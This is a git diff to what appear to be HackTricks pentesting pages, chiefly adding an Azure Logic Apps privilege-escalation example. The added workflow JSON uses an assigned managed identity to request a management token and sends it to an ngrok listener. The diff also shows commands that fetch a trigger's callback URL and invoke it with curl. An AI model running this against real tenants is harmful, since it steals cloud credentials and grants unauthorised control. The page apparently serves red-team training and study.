diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md
index a0bdd4d2a..fa05e2626 100644
--- a/src/banners/hacktricks-training.md
+++ b/src/banners/hacktricks-training.md
@@ -1,6 +1,6 @@
> [!TIP]
> Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-> Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)\
> Learn & practice Az Hacking: 
[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)
>
>
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
index b70b229bb..302a4fc67 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
@@ -26,7 +26,50 @@ az logic workflow update \
--definition
```
-And after changing it, you can run it with:
+Example definition of workflow with manual trigger to steal a management token of an assigned identity listeningn in a ngrok URL:
+
+```json
+{
+ "definition": {
+ "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowDefinition.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {},
+ "triggers": {
+ "manual": {
+ "type": "Request",
+ "kind": "Http",
+ "inputs": { "schema": {} }
+ }
+ },
+ "actions": {
+ "GetSecret": {
+ "type": "Http",
+ "inputs": {
+ "method": "GET",
+ "uri": "https://82fa-81-33-67-18.ngrok-free.app",
+ "authentication": {
+ "type": "ManagedServiceIdentity",
+ "audience": "https://management.azure.com/",
+ "identity": "/subscriptions/0c7db2d7-90ba-4106-8610-cdd8c06971fe/resourceGroups/-rg-10b8e451/providers/Microsoft.ManagedIdentity/userAssignedIdentities/uai-10b8e451",
+ }
+ }
+ },
+ "Respond": {
+ "type": "Response",
+ "runAfter": { "GetSecret": ["Succeeded"] },
+ "inputs": {
+ "statusCode": 200,
+ "body": "@body('GetSecret')"
+ }
+ }
+ },
+ "outputs": {}
+ },
+ "parameters": {}
+}
+```
+
+And after modifying it, you can run it with:
```bash
az rest \
@@ -36,9 +79,19 @@ az rest \
--headers "Content-Type=application/json"
```
+OIf there is a manual trigger, you can get the callback URL and run it:
+
+```bash
+az rest --method POST \
+ --url "https://management.azure.com/subscriptions//resourceGroups/>/providers/Microsoft.Logic/workflows/>/triggers/manual/listCallbackUrl?api-version=2019-05-01" \
+ --query "value" -o tsv
+
+curl -X POST "https://prod-11.centralus.logic.azure.com:443/workflows/02f4e715c50a42c58b683629ddb889f5/triggers/manual/paths/invoke?api-version=2019-05-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=5m1THJOCzEl6WoZyaont4i2A62PpSZhK3BtVAzYYTPY"
+```
+
### Microsoft.Logic/workflows/write
-With just this permission it's possible tochange the Authorization Policy, giving for example another tenant the capability to trigger the workflow:
+With just this permission it's possible to change the Authorization Policy, giving for example another tenant the capability to trigger the workflow:
```bash
az rest --method PUT \